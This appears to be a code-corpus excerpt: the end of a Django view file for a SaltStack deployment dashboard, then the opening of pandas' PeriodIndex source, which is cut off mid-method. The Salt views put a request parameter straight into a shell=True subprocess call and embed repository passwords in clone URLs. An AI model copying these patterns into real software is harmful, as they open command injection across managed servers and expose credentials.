cur_path = request.POST.get('rollback_list', None)
file_tag = request.POST.get('rollback_remark', None)
rollback_history_remark = FileRollback.objects.filter(cur_path=cur_path).filter(file_tag=file_tag)\
.filter(target=tgt_select)
for r in rollback_history_remark:
r_list.append(r.remark)
return HttpResponse(json.dumps(r_list))
else:
if request.POST.get('check_type') == 'panel-group':
grp = request.POST.get('tgt_select')
tgt_select = SaltGroup.objects.get(nickname=grp).groupname
expr_form = 'nodegroup'
else:
tgt_select = request.POST.get('tgt_select')
expr_form = 'list'
remote_path = request.POST.get('remote_path')
file_tag = request.POST.get('tag')
sapi = SaltAPI(url=settings.SALT_API['url'],username=settings.SALT_API['user'],password=settings.SALT_API['password'])
file_tag_new = '%s%s' % (request.user.id, datetime.datetime.now().strftime('%j%Y%m%d%H%M%S'))
# 回滚前备份远程文件
ret_bak = sapi.file_manage(tgt_select, 'file_bakup.Backup', remote_path, file_tag_new, None, expr_form)
# 文件回滚
ret = sapi.file_manage(tgt_select, 'file_bakup.Rollback', remote_path, file_tag, None, expr_form)
rst = ''
for k in ret:
rst = rst + u'主机:' + k + '\n回滚结果:\n' + ret[k] + '\n' + '-'*80 + '\n'
Message.objects.create(type=u'文件管理', user=request.user.first_name, action=u'文件回滚', action_ip=UserIP(request),content=u'文件回滚 %s'%rst)
return HttpResponse(json.dumps(rst))
else:
raise Http404
@login_required
def salt_task_list(request):
'''
任务列表
'''
if request.user.has_perm('userperm.view_message'):
if request.method == 'GET':
if request.GET.has_key('tid'):
tid = request.get_full_path().split('=')[1]
log_detail = Message.objects.filter(user=request.user.first_name).filter(id=tid).exclude(type=u'用户登录').exclude(type=u'用户退出')
return render(request, 'salt_task_detail.html', {'log_detail':log_detail})
logs = Message.objects.filter(user=request.user.first_name).exclude(type=u'用户登录').exclude(type=u'用户退出')[:200]
return render(request, 'salt_task_list.html', {'all_logs':logs})
else:
raise Http404
@login_required
def salt_task_check(request):
'''
任务查询
'''
return render(request, 'salt_task_check.html', {})
@login_required
def salt_task_running(request):
'''
获取运行中的任务
'''
ret = []
if request.method == 'POST':
if request.user.has_perms(['userperm.view_message', 'deploy.edit_deploy']):
if request.is_ajax():
sapi = SaltAPI(url=settings.SALT_API['url'],username=settings.SALT_API['user'],password=settings.SALT_API['password'])
rst = sapi.salt_running_jobs()
for k,v in rst.items():
dict={}
dict['jid'] = k
dict['func'] = v['Function']
dict['tgt_type'] = v['Target-type']
dict['running'] = v['Arguments'][0].replace(';echo ":::"$?','')
str_tgt = ''
for i in v['Running']:
for m,n in i.items():
str_tgt = str_tgt + m + ':' + str(n) + '<br />'
dict['tgt_pid'] = str_tgt
ret.append(dict)
return HttpResponse(json.dumps(ret))
if request.GET.has_key('delete'):
jid = request.GET.get('jid')
import subprocess
p=subprocess.Popen("salt '*' saltutil.term_job %s"%jid, shell=True, stdout=subprocess.PIPE)
out=p.stdout.readlines()
return HttpResponse(json.dumps('Job %s killed.'%jid))
return render(request, 'salt_task_running_list.html', {})
@login_required
def project_list(request):
'''
项目列表
'''
if request.user.has_perm('deploy.view_project'):
if request.user.is_superuser:
project_list = Project.objects.all()
else:
user_group = User.objects.get(pk=request.user.id).group.all()
for g in user_group:
project_list = Project.objects.filter(user_group=g)
return render(request, 'salt_project_list.html', {'projects':project_list})
else:
raise Http404
@login_required
def project_manage(request, id=None):
'''
项目管理
:param request:
:param id:
:return:
'''
rsync_conf = './media/salt/rsync'
if request.user.has_perm('deploy.view_project'):
content = ''
if id:
project = get_object_or_404(Project, pk=id)
action = 'edit'
page_name = '编辑项目'
try:
with open('%s/%s.list' % (rsync_conf, project.name), 'r') as f:
content = f.read()
except:
pass
else:
project = Project()
action = 'add'
page_name = '新增项目'
if request.method == 'GET':
if request.GET.has_key('delete'):
id = request.GET.get('id')
project = get_object_or_404(Project, pk=id)
project.delete()
Message.objects.create(type=u'部署管理', user=request.user.first_name, action=u'删除项目',
action_ip=UserIP(request), content=u'删除项目 %s' % project.pname)
return redirect('project_list')
if request.method == 'POST':
form = ProjectForm(request.user, request.POST, instance=project)
if form.is_valid():
if action == 'add':
project = form.save(commit=False)
project.user = request.user
else:
form.save
project.name = form.cleaned_data['src'].split('/')[-1].replace('.git', '')
project.save()
exclude = request.POST.get('exclude')
try:
if not os.path.isdir(rsync_conf):
os.makedirs(rsync_conf)
with open('%s/%s.list'%(rsync_conf,project.name),'w') as f:
f.write(exclude)
except:
pass
Message.objects.create(type=u'部署管理', user=request.user.first_name, action=page_name,
action_ip=UserIP(request), content='%s %s' % (page_name, project.pname))
return redirect('project_list')
else:
form = ProjectForm(request.user, instance=project)
return render(request, 'salt_project_manage.html', {'form':form, 'action':action, 'page_name':page_name, 'aid':id, 'content':content})
else:
raise Http404
@login_required
def project_deploy(request):
'''
项目部署
:param request:
:return:
'''
if request.user.has_perm('deploy.edit_project'):
if request.method == 'GET':
if request.is_ajax():
id = request.GET.get('id')
env = request.GET.get('env')
project = Project.objects.get(pk=id)
if env == '0':
tgt_list = project.salt_test
elif env == '1':
tgt_list = project.salt_group
else:
pass
if tgt_list == '0':
ret = {u'发布异常':{'result':u'请确认是否配置测试/正式环境'}}
if request.GET.has_key('get_rollback'):
ret = {'-1': u'请确认是否配置测试/正式环境'}
return HttpResponse(json.dumps(ret))
expr_form = 'nodegroup'
action = ''
url = project.src.split('//')
sapi = SaltAPI(url=settings.SALT_API['url'], username=settings.SALT_API['user'],
password=settings.SALT_API['password'])
dtime = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
ret = sapi.file_copy(tgt_list, 'cp.get_file', 'salt://rsync/%s.list' % project.name,
'/srv/salt/%s.list' % project.name, 'nodegroup')
if request.GET.has_key('init'):
action = u'初始化项目'
ret = sapi.project_manage(tgt_list, 'project_manage.ProjectSync', project.name,
'%s//%s:%s@%s' % (url[0], project.src_user, project.src_passwd, url[1]),
project.path, 'init', dtime, expr_form)
if request.GET.has_key('update'):
action = u'更新项目'
try:
ret = sapi.project_manage(tgt_list, 'project_manage.ProjectSync', project.name,
'%s//%s:%s@%s' % (url[0], project.src_user, project.src_passwd, url[1]),
project.path, 'update', dtime, expr_form)
for _, v in ret.items():
if v['tag']:
ProjectRollback.objects.create(name=project, tag=v['tag'], env=env)
break
except:
ret = {u'更新异常':{'result':u'更新失败,检查项目是否发布'}}
if request.GET.has_key('get_rollback'):
action = u'获取备份'
ret = {i['pk']: i['tag'] for i in
ProjectRollback.objects.filter(name=id).filter(env=env).values('pk', 'tag')}
if not ret:
ret = {'0':'No backup found.'}
if request.GET.has_key('rollback_delete'):
action = u'删除备份'
tag = request.GET.get('tag')
enforce = request.GET.get('enforce')
ret = sapi.project_manage(tgt_list, 'project_manage.ProjectClean', project.name, tag,
project.path, 'delete', dtime, expr_form)
for _, v in ret.items():
if v['tag'] or enforce == '1':
ProjectRollback.objects.get(name=project, tag=tag, env=env).delete()
break
if request.GET.has_key('rollback'):
action = u'回滚项目'
tag = request.GET.get('tag')
ret = sapi.project_manage(tgt_list, 'project_manage.ProjectRollback', project.name, tag,
project.path, 'rollback', dtime, expr_form)
if request.GET.has_key('start'):
action = u'启动进程'
tag = request.GET.get('tag')
if tag:
ret = ProjectExec(sapi, tgt_list, 'cmd.run', tag, expr_form)
else:
ret = {u'进程管理': {'result': u'未配置启动项'}}
if request.GET.has_key('reload'):
action = u'重启进程'
tag = request.GET.get('tag')
if tag:
ret = ProjectExec(sapi, tgt_list, 'cmd.run', tag, expr_form)
else:
ret = {u'进程管理': {'result': u'未配置重启项'}}
if request.GET.has_key('stop'):
action = u'停止进程'
tag = request.GET.get('tag')
if tag:
ret = ProjectExec(sapi, tgt_list, 'cmd.run', tag, expr_form)
else:
ret = {u'进程管理': {'result': u'未配置停止项'}}
Message.objects.create(type=u'项目管理', user=request.user.first_name, action=action,
action_ip=UserIP(request), content='%s %s' % (project.pname, ret))
return HttpResponse(json.dumps(ret))
return redirect(project_list)
else:
raise Http404
def page_test(request):
return render(request,"page_test.html") | 41.697901 | 172 | 0.482912 |
4a224d4e6ee7f15865aea6aa55b6a7268427fdde | 44,284 | py | Python | pandas/core/indexes/period.py | mapehe/pandas | 8ddc0fd801d794fcd7735816790dff66d1c678e2 | [
"BSD-3-Clause"
] | 2 | 2021-01-13T09:40:44.000Z | 2021-01-13T09:40:52.000Z | pandas/core/indexes/period.py | mapehe/pandas | 8ddc0fd801d794fcd7735816790dff66d1c678e2 | [
"BSD-3-Clause"
] | null | null | null | pandas/core/indexes/period.py | mapehe/pandas | 8ddc0fd801d794fcd7735816790dff66d1c678e2 | [
"BSD-3-Clause"
] | null | null | null | # pylint: disable=E1101,E1103,W0232
from datetime import datetime, timedelta
import numpy as np
import warnings
from pandas.core import common as com
from pandas.core.dtypes.common import (
is_integer,
is_float,
is_integer_dtype,
is_float_dtype,
is_scalar,
is_datetime64_dtype,
is_datetime64_any_dtype,
is_period_dtype,
is_bool_dtype,
pandas_dtype,
_ensure_object)
from pandas.core.dtypes.dtypes import PeriodDtype
from pandas.core.dtypes.generic import ABCSeries
import pandas.tseries.frequencies as frequencies
from pandas.tseries.frequencies import get_freq_code as _gfc
from pandas.tseries.offsets import Tick, DateOffset
from pandas.core.indexes.datetimes import DatetimeIndex, Int64Index, Index
from pandas.core.indexes.datetimelike import DatelikeOps, DatetimeIndexOpsMixin
from pandas.core.tools.datetimes import parse_time_string
from pandas._libs.lib import infer_dtype
from pandas._libs import tslib, index as libindex
from pandas._libs.tslibs.period import (Period, IncompatibleFrequency,
get_period_field_arr,
_validate_end_alias, _quarter_to_myear)
from pandas._libs.tslibs.fields import isleapyear_arr
from pandas._libs.tslibs import resolution, period
from pandas._libs.tslibs.timedeltas import delta_to_nanoseconds
from pandas.core.base import _shared_docs
from pandas.core.indexes.base import _index_shared_docs, _ensure_index
from pandas import compat
from pandas.util._decorators import (Appender, Substitution, cache_readonly,
deprecate_kwarg)
from pandas.compat import zip, u
import pandas.core.indexes.base as ibase
_index_doc_kwargs = dict(ibase._index_doc_kwargs)
_index_doc_kwargs.update(
dict(target_klass='PeriodIndex or list of Periods'))
def _field_accessor(name, alias, docstring=None):
def f(self):
base, mult = _gfc(self.freq)
result = get_period_field_arr(alias, self._ndarray_values, base)
return Index(result, name=self.name)
f.__name__ = name
f.__doc__ = docstring
return property(f)
def dt64arr_to_periodarr(data, freq, tz):
if data.dtype != np.dtype('M8[ns]'):
raise ValueError('Wrong dtype: %s' % data.dtype)
freq = Period._maybe_convert_freq(freq)
base, mult = _gfc(freq)
return period.dt64arr_to_periodarr(data.view('i8'), base, tz)
# --- Period index sketch
_DIFFERENT_FREQ_INDEX = period._DIFFERENT_FREQ_INDEX
def _period_index_cmp(opname, cls):
"""
Wrap comparison operations to convert Period-like to PeriodDtype
"""
nat_result = True if opname == '__ne__' else False
def wrapper(self, other):
op = getattr(self._ndarray_values, opname)
if isinstance(other, Period):
if other.freq != self.freq:
msg = _DIFFERENT_FREQ_INDEX.format(self.freqstr, other.freqstr)
raise IncompatibleFrequency(msg)
result = op(other.ordinal)
elif isinstance(other, PeriodIndex):
if other.freq != self.freq:
msg = _DIFFERENT_FREQ_INDEX.format(self.freqstr, other.freqstr)
raise IncompatibleFrequency(msg)
result = op(other._ndarray_values)
mask = self._isnan | other._isnan
if mask.any():
result[mask] = nat_result
return result
elif other is tslib.NaT:
result = np.empty(len(self._ndarray_values), dtype=bool)
result.fill(nat_result)
else:
other = Period(other, freq=self.freq)
result = op(other.ordinal)
if self.hasnans:
result[self._isnan] = nat_result
return result
return compat.set_function_name(wrapper, opname, cls)
def _new_PeriodIndex(cls, **d):
# GH13277 for unpickling
if d['data'].dtype == 'int64':
values = d.pop('data')
return cls._from_ordinals(values=values, **d)
class PeriodIndex(DatelikeOps, DatetimeIndexOpsMixin, Int64Index):
"""
Immutable ndarray holding ordinal values indicating regular periods in
time such as particular years, quarters, months, etc.
Index keys are boxed to Period objects which carries the metadata (eg,
frequency information).
Parameters
----------
data : array-like (1-dimensional), optional
Optional period-like data to construct index with
copy : bool
Make a copy of input ndarray
freq : string or period object, optional
One of pandas period strings or corresponding objects
start : starting value, period-like, optional
If data is None, used as the start point in generating regular
period data.
periods : int, optional, > 0
Number of periods to generate, if generating index. Takes precedence
over end argument
end : end value, period-like, optional
If periods is none, generated index will extend to first conforming
period on or just past end argument
year : int, array, or Series, default None
month : int, array, or Series, default None
quarter : int, array, or Series, default None
day : int, array, or Series, default None
hour : int, array, or Series, default None
minute : int, array, or Series, default None
second : int, array, or Series, default None
tz : object, default None
Timezone for converting datetime64 data to Periods
dtype : str or PeriodDtype, default None
Attributes
----------
day
dayofweek
dayofyear
days_in_month
daysinmonth
end_time
freq
freqstr
hour
is_leap_year
minute
month
quarter
qyear
second
start_time
week
weekday
weekofyear
year
Methods
-------
asfreq
strftime
to_timestamp
tz_convert
tz_localize
Examples
--------
>>> idx = PeriodIndex(year=year_arr, quarter=q_arr)
>>> idx2 = PeriodIndex(start='2000', end='2010', freq='A')
See Also
---------
Index : The base pandas Index type
Period : Represents a period of time
DatetimeIndex : Index with datetime64 data
TimedeltaIndex : Index of timedelta64 data
"""
_typ = 'periodindex'
_attributes = ['name', 'freq']
# define my properties & methods for delegation
_other_ops = []
_bool_ops = ['is_leap_year']
_object_ops = ['start_time', 'end_time', 'freq']
_field_ops = ['year', 'month', 'day', 'hour', 'minute', 'second',
'weekofyear', 'weekday', 'week', 'dayofweek',
'dayofyear', 'quarter', 'qyear',
'days_in_month', 'daysinmonth']
_datetimelike_ops = _field_ops + _object_ops + _bool_ops
_datetimelike_methods = ['strftime', 'to_timestamp', 'asfreq']
_is_numeric_dtype = False
_infer_as_myclass = True
freq = None
_engine_type = libindex.PeriodEngine
@classmethod
def _add_comparison_methods(cls):
""" add in comparison methods """
cls.__eq__ = _period_index_cmp('__eq__', cls)
cls.__ne__ = _period_index_cmp('__ne__', cls)
cls.__lt__ = _period_index_cmp('__lt__', cls)
cls.__gt__ = _period_index_cmp('__gt__', cls)
cls.__le__ = _period_index_cmp('__le__', cls)
cls.__ge__ = _period_index_cmp('__ge__', cls)
def __new__(cls, data=None, ordinal=None, freq=None, start=None, end=None,
periods=None, tz=None, dtype=None, copy=False, name=None,
**fields):
valid_field_set = {'year', 'month', 'day', 'quarter',
'hour', 'minute', 'second'}
if not set(fields).issubset(valid_field_set):
raise TypeError('__new__() got an unexpected keyword argument {}'.
format(list(set(fields) - valid_field_set)[0]))
if periods is not None:
if is_float(periods):
periods = int(periods)
elif not is_integer(periods):
msg = 'periods must be a number, got {periods}'
raise TypeError(msg.format(periods=periods))
if name is None and hasattr(data, 'name'):
name = data.name
if dtype is not None:
dtype = pandas_dtype(dtype)
if not is_period_dtype(dtype):
raise ValueError('dtype must be PeriodDtype')
if freq is None:
freq = dtype.freq
elif freq != dtype.freq:
msg = 'specified freq and dtype are different'
raise IncompatibleFrequency(msg)
# coerce freq to freq object, otherwise it can be coerced elementwise
# which is slow
if freq:
freq = Period._maybe_convert_freq(freq)
if data is None:
if ordinal is not None:
data = np.asarray(ordinal, dtype=np.int64)
else:
data, freq = cls._generate_range(start, end, periods,
freq, fields)
return cls._from_ordinals(data, name=name, freq=freq)
if isinstance(data, PeriodIndex):
if freq is None or freq == data.freq: # no freq change
freq = data.freq
data = data._ndarray_values
else:
base1, _ = _gfc(data.freq)
base2, _ = _gfc(freq)
data = period.period_asfreq_arr(data._ndarray_values,
base1, base2, 1)
return cls._simple_new(data, name=name, freq=freq)
# not array / index
if not isinstance(data, (np.ndarray, PeriodIndex,
DatetimeIndex, Int64Index)):
if is_scalar(data) or isinstance(data, Period):
cls._scalar_data_error(data)
# other iterable of some kind
if not isinstance(data, (list, tuple)):
data = list(data)
data = np.asarray(data)
# datetime other than period
if is_datetime64_dtype(data.dtype):
data = dt64arr_to_periodarr(data, freq, tz)
return cls._from_ordinals(data, name=name, freq=freq)
# check not floats
if infer_dtype(data) == 'floating' and len(data) > 0:
raise TypeError("PeriodIndex does not allow "
"floating point in construction")
# anything else, likely an array of strings or periods
data = _ensure_object(data)
freq = freq or period.extract_freq(data)
data = period.extract_ordinals(data, freq)
return cls._from_ordinals(data, name=name, freq=freq)
@cache_readonly
def _engine(self):
return self._engine_type(lambda: self, len(self))
@classmethod
def _generate_range(cls, start, end, periods, freq, fields):
if freq is not None:
freq = Period._maybe_convert_freq(freq)
field_count = len(fields)
if com._count_not_none(start, end) > 0:
if field_count > 0:
raise ValueError('Can either instantiate from fields '
'or endpoints, but not both')
subarr, freq = _get_ordinal_range(start, end, periods, freq)
elif field_count > 0:
subarr, freq = _range_from_fields(freq=freq, **fields)
else:
raise ValueError('Not enough parameters to construct '
'Period range')
return subarr, freq
@classmethod
def _simple_new(cls, values, name=None, freq=None, **kwargs):
"""
Values can be any type that can be coerced to Periods.
Ordinals in an ndarray are fastpath-ed to `_from_ordinals`
"""
if not is_integer_dtype(values):
values = np.array(values, copy=False)
if len(values) > 0 and is_float_dtype(values):
raise TypeError("PeriodIndex can't take floats")
return cls(values, name=name, freq=freq, **kwargs)
return cls._from_ordinals(values, name, freq, **kwargs)
@classmethod
def _from_ordinals(cls, values, name=None, freq=None, **kwargs):
"""
Values should be int ordinals
`__new__` & `_simple_new` cooerce to ordinals and call this method
"""
values = np.array(values, dtype='int64', copy=False)
result = object.__new__(cls)
result._data = values
result.name = name
if freq is None:
raise ValueError('freq is not specified and cannot be inferred')
result.freq = Period._maybe_convert_freq(freq)
result._reset_identity()
return result
def _shallow_copy_with_infer(self, values=None, **kwargs):
""" we always want to return a PeriodIndex """
return self._shallow_copy(values=values, **kwargs)
def _shallow_copy(self, values=None, freq=None, **kwargs):
if freq is None:
freq = self.freq
if values is None:
values = self._ndarray_values
return super(PeriodIndex, self)._shallow_copy(values=values,
freq=freq, **kwargs)
def _coerce_scalar_to_index(self, item):
"""
we need to coerce a scalar to a compat for our index type
Parameters
----------
item : scalar item to coerce
"""
return PeriodIndex([item], **self._get_attributes_dict())
@Appender(_index_shared_docs['__contains__'])
def __contains__(self, key):
if isinstance(key, Period):
if key.freq != self.freq:
return False
else:
return key.ordinal in self._engine
else:
try:
self.get_loc(key)
return True
except Exception:
return False
return False
contains = __contains__
@property
def asi8(self):
return self._ndarray_values.view('i8')
@cache_readonly
def _int64index(self):
return Int64Index(self.asi8, name=self.name, fastpath=True)
@property
def values(self):
return self.astype(object).values
@property
def _ndarray_values(self):
# Ordinals
return self._data
def __array__(self, dtype=None):
if is_integer_dtype(dtype):
return self.asi8
else:
return self.astype(object).values
def __array_wrap__(self, result, context=None):
"""
Gets called after a ufunc. Needs additional handling as
PeriodIndex stores internal data as int dtype
Replace this to __numpy_ufunc__ in future version
"""
if isinstance(context, tuple) and len(context) > 0:
func = context[0]
if (func is np.add):
pass
elif (func is np.subtract):
name = self.name
left = context[1][0]
right = context[1][1]
if (isinstance(left, PeriodIndex) and
isinstance(right, PeriodIndex)):
name = left.name if left.name == right.name else None
return Index(result, name=name)
elif isinstance(left, Period) or isinstance(right, Period):
return Index(result, name=name)
elif isinstance(func, np.ufunc):
if 'M->M' not in func.types:
msg = "ufunc '{0}' not supported for the PeriodIndex"
# This should be TypeError, but TypeError cannot be raised
# from here because numpy catches.
raise ValueError(msg.format(func.__name__))
if is_bool_dtype(result):
return result
# the result is object dtype array of Period
# cannot pass _simple_new as it is
return self._shallow_copy(result, freq=self.freq, name=self.name)
@property
def _box_func(self):
return lambda x: Period._from_ordinal(ordinal=x, freq=self.freq)
def _to_embed(self, keep_tz=False, dtype=None):
"""
return an array repr of this object, potentially casting to object
"""
if dtype is not None:
return self.astype(dtype)._to_embed(keep_tz=keep_tz)
return self.astype(object).values
@property
def size(self):
# Avoid materializing self._values
return self._ndarray_values.size
@property
def shape(self):
# Avoid materializing self._values
return self._ndarray_values.shape
@property
def _formatter_func(self):
return lambda x: "'%s'" % x
def asof_locs(self, where, mask):
"""
where : array of timestamps
mask : array of booleans where data is not NA
"""
where_idx = where
if isinstance(where_idx, DatetimeIndex):
where_idx = PeriodIndex(where_idx.values, freq=self.freq)
locs = self._ndarray_values[mask].searchsorted(
where_idx._ndarray_values, side='right')
locs = np.where(locs > 0, locs - 1, 0)
result = np.arange(len(self))[mask].take(locs)
first = mask.argmax()
result[(locs == 0) & (where_idx._ndarray_values <
self._ndarray_values[first])] = -1
return result
@Appender(_index_shared_docs['astype'])
def astype(self, dtype, copy=True, how='start'):
dtype = pandas_dtype(dtype)
if is_integer_dtype(dtype):
return self._int64index.copy() if copy else self._int64index
elif is_datetime64_any_dtype(dtype):
tz = getattr(dtype, 'tz', None)
return self.to_timestamp(how=how).tz_localize(tz)
elif is_period_dtype(dtype):
return self.asfreq(freq=dtype.freq)
return super(PeriodIndex, self).astype(dtype, copy=copy)
@Substitution(klass='PeriodIndex')
@Appender(_shared_docs['searchsorted'])
@deprecate_kwarg(old_arg_name='key', new_arg_name='value')
def searchsorted(self, value, side='left', sorter=None):
if isinstance(value, Period):
if value.freq != self.freq:
msg = _DIFFERENT_FREQ_INDEX.format(self.freqstr, value.freqstr)
raise IncompatibleFrequency(msg)
value = value.ordinal
elif isinstance(value, compat.string_types):
value = Period(value, freq=self.freq).ordinal
return self._ndarray_values.searchsorted(value, side=side,
sorter=sorter)
@property
def is_all_dates(self):
return True
@property
def is_full(self):
"""
Returns True if there are any missing periods from start to end
"""
if len(self) == 0:
return True
if not self.is_monotonic:
raise ValueError('Index is not monotonic')
values = self.values
return ((values[1:] - values[:-1]) < 2).all()
def asfreq(self, freq=None, how='E'):
"""
Convert the PeriodIndex to the specified frequency `freq`.
Parameters
----------
freq : str
a frequency
how : str {'E', 'S'}
'E', 'END', or 'FINISH' for end,
'S', 'START', or 'BEGIN' for start.
Whether the elements should be aligned to the end
or start within pa period. January 31st ('END') vs.
Janury 1st ('START') for example.
Returns
-------
new : PeriodIndex with the new frequency
Examples
--------
>>> pidx = pd.period_range('2010-01-01', '2015-01-01', freq='A')
>>> pidx
<class 'pandas.core.indexes.period.PeriodIndex'>
[2010, ..., 2015]
Length: 6, Freq: A-DEC
>>> pidx.asfreq('M')
<class 'pandas.core.indexes.period.PeriodIndex'>
[2010-12, ..., 2015-12]
Length: 6, Freq: M
>>> pidx.asfreq('M', how='S')
<class 'pandas.core.indexes.period.PeriodIndex'>
[2010-01, ..., 2015-01]
Length: 6, Freq: M
"""
how = _validate_end_alias(how)
freq = Period._maybe_convert_freq(freq)
base1, mult1 = _gfc(self.freq)
base2, mult2 = _gfc(freq)
asi8 = self.asi8
# mult1 can't be negative or 0
end = how == 'E'
if end:
ordinal = asi8 + mult1 - 1
else:
ordinal = asi8
new_data = period.period_asfreq_arr(ordinal, base1, base2, end)
if self.hasnans:
new_data[self._isnan] = tslib.iNaT
return self._simple_new(new_data, self.name, freq=freq)
year = _field_accessor('year', 0, "The year of the period")
month = _field_accessor('month', 3, "The month as January=1, December=12")
day = _field_accessor('day', 4, "The days of the period")
hour = _field_accessor('hour', 5, "The hour of the period")
minute = _field_accessor('minute', 6, "The minute of the period")
second = _field_accessor('second', 7, "The second of the period")
weekofyear = _field_accessor('week', 8, "The week ordinal of the year")
week = weekofyear
dayofweek = _field_accessor('dayofweek', 10,
"The day of the week with Monday=0, Sunday=6")
weekday = dayofweek
dayofyear = day_of_year = _field_accessor('dayofyear', 9,
"The ordinal day of the year")
quarter = _field_accessor('quarter', 2, "The quarter of the date")
qyear = _field_accessor('qyear', 1)
days_in_month = _field_accessor('days_in_month', 11,
"The number of days in the month")
daysinmonth = days_in_month
@property
def is_leap_year(self):
""" Logical indicating if the date belongs to a leap year """
return isleapyear_arr(np.asarray(self.year))
@property
def start_time(self):
return self.to_timestamp(how='start')
@property
def end_time(self):
return self.to_timestamp(how='end')
def _mpl_repr(self):
# how to represent ourselves to matplotlib
return self.astype(object).values
def to_timestamp(self, freq=None, how='start'):
"""
Cast to DatetimeIndex
Parameters
----------
freq : string or DateOffset, optional
Target frequency. The default is 'D' for week or longer,
'S' otherwise
how : {'s', 'e', 'start', 'end'}
Returns
-------
DatetimeIndex
"""
how = _validate_end_alias(how)
if freq is None:
base, mult = _gfc(self.freq)
freq = frequencies.get_to_timestamp_base(base)
else:
freq = Period._maybe_convert_freq(freq)
base, mult = _gfc(freq)
new_data = self.asfreq(freq, how)
new_data = period.periodarr_to_dt64arr(new_data._ndarray_values, base)
return DatetimeIndex(new_data, freq='infer', name=self.name)
def _maybe_convert_timedelta(self, other):
if isinstance(
other, (timedelta, np.timedelta64, Tick, np.ndarray)):
offset = frequencies.to_offset(self.freq.rule_code)
if isinstance(offset, Tick):
if isinstance(other, np.ndarray):
nanos = np.vectorize(delta_to_nanoseconds)(other)
else:
nanos = delta_to_nanoseconds(other)
offset_nanos = delta_to_nanoseconds(offset)
check = np.all(nanos % offset_nanos == 0)
if check:
return nanos // offset_nanos
elif isinstance(other, DateOffset):
freqstr = other.rule_code
base = frequencies.get_base_alias(freqstr)
if base == self.freq.rule_code:
return other.n
msg = _DIFFERENT_FREQ_INDEX.format(self.freqstr, other.freqstr)
raise IncompatibleFrequency(msg)
elif is_integer(other):
# integer is passed to .shift via
# _add_datetimelike_methods basically
# but ufunc may pass integer to _add_delta
return other
# raise when input doesn't have freq
msg = "Input has different freq from PeriodIndex(freq={0})"
raise IncompatibleFrequency(msg.format(self.freqstr))
def _add_offset(self, other):
assert not isinstance(other, Tick)
base = frequencies.get_base_alias(other.rule_code)
if base != self.freq.rule_code:
msg = _DIFFERENT_FREQ_INDEX.format(self.freqstr, other.freqstr)
raise IncompatibleFrequency(msg)
return self.shift(other.n)
def _add_delta_td(self, other):
assert isinstance(other, (timedelta, np.timedelta64, Tick))
nanos = delta_to_nanoseconds(other)
own_offset = frequencies.to_offset(self.freq.rule_code)
if isinstance(own_offset, Tick):
offset_nanos = delta_to_nanoseconds(own_offset)
if np.all(nanos % offset_nanos == 0):
return self.shift(nanos // offset_nanos)
# raise when input doesn't have freq
raise IncompatibleFrequency("Input has different freq from "
"{cls}(freq={freqstr})"
.format(cls=type(self).__name__,
freqstr=self.freqstr))
def _add_delta(self, other):
ordinal_delta = self._maybe_convert_timedelta(other)
return self.shift(ordinal_delta)
def _sub_datelike(self, other):
assert other is not tslib.NaT
return NotImplemented
def _sub_period(self, other):
if self.freq != other.freq:
msg = _DIFFERENT_FREQ_INDEX.format(self.freqstr, other.freqstr)
raise IncompatibleFrequency(msg)
asi8 = self.asi8
new_data = asi8 - other.ordinal
if self.hasnans:
new_data = new_data.astype(np.float64)
new_data[self._isnan] = np.nan
# result must be Int64Index or Float64Index
return Index(new_data)
def shift(self, n):
"""
Specialized shift which produces an PeriodIndex
Parameters
----------
n : int
Periods to shift by
Returns
-------
shifted : PeriodIndex
"""
values = self._ndarray_values + n * self.freq.n
if self.hasnans:
values[self._isnan] = tslib.iNaT
return self._shallow_copy(values=values)
@cache_readonly
def dtype(self):
return PeriodDtype.construct_from_string(self.freq)
@property
def inferred_type(self):
# b/c data is represented as ints make sure we can't have ambiguous
# indexing
return 'period'
def get_value(self, series, key):
"""
Fast lookup of value from 1-dimensional ndarray. Only use this if you
know what you're doing
"""
s = com._values_from_object(series)
try:
return com._maybe_box(self,
super(PeriodIndex, self).get_value(s, key),
series, key)
except (KeyError, IndexError):
try:
asdt, parsed, reso = parse_time_string(key, self.freq)
grp = resolution.Resolution.get_freq_group(reso)
freqn = resolution.get_freq_group(self.freq)
vals = self._ndarray_values
# if our data is higher resolution than requested key, slice
if grp < freqn:
iv = Period(asdt, freq=(grp, 1))
ord1 = iv.asfreq(self.freq, how='S').ordinal
ord2 = iv.asfreq(self.freq, how='E').ordinal
if ord2 < vals[0] or ord1 > vals[-1]:
raise KeyError(key)
pos = np.searchsorted(self._ndarray_values, [ord1, ord2])
key = slice(pos[0], pos[1] + 1)
return series[key]
elif grp == freqn:
key = Period(asdt, freq=self.freq).ordinal
return com._maybe_box(self, self._engine.get_value(s, key),
series, key)
else:
raise KeyError(key)
except TypeError:
pass
key = Period(key, self.freq).ordinal
return com._maybe_box(self, self._engine.get_value(s, key),
series, key)
@Appender(_index_shared_docs['get_indexer'] % _index_doc_kwargs)
def get_indexer(self, target, method=None, limit=None, tolerance=None):
target = _ensure_index(target)
if hasattr(target, 'freq') and target.freq != self.freq:
msg = _DIFFERENT_FREQ_INDEX.format(self.freqstr, target.freqstr)
raise IncompatibleFrequency(msg)
if isinstance(target, PeriodIndex):
target = target.asi8
if tolerance is not None:
tolerance = self._convert_tolerance(tolerance, target)
return Index.get_indexer(self._int64index, target, method,
limit, tolerance)
def _get_unique_index(self, dropna=False):
"""
wrap Index._get_unique_index to handle NaT
"""
res = super(PeriodIndex, self)._get_unique_index(dropna=dropna)
if dropna:
res = res.dropna()
return res
def get_loc(self, key, method=None, tolerance=None):
"""
Get integer location for requested label
Returns
-------
loc : int
"""
try:
return self._engine.get_loc(key)
except KeyError:
if is_integer(key):
raise
try:
asdt, parsed, reso = parse_time_string(key, self.freq)
key = asdt
except TypeError:
pass
try:
key = Period(key, freq=self.freq)
except ValueError:
# we cannot construct the Period
# as we have an invalid type
raise KeyError(key)
try:
ordinal = tslib.iNaT if key is tslib.NaT else key.ordinal
if tolerance is not None:
tolerance = self._convert_tolerance(tolerance,
np.asarray(key))
return self._int64index.get_loc(ordinal, method, tolerance)
except KeyError:
raise KeyError(key)
def _maybe_cast_slice_bound(self, label, side, kind):
"""
If label is a string or a datetime, cast it to Period.ordinal according
to resolution.
Parameters
----------
label : object
side : {'left', 'right'}
kind : {'ix', 'loc', 'getitem'}
Returns
-------
bound : Period or object
Notes
-----
Value of `side` parameter should be validated in caller.
"""
assert kind in ['ix', 'loc', 'getitem']
if isinstance(label, datetime):
return Period(label, freq=self.freq)
elif isinstance(label, compat.string_types):
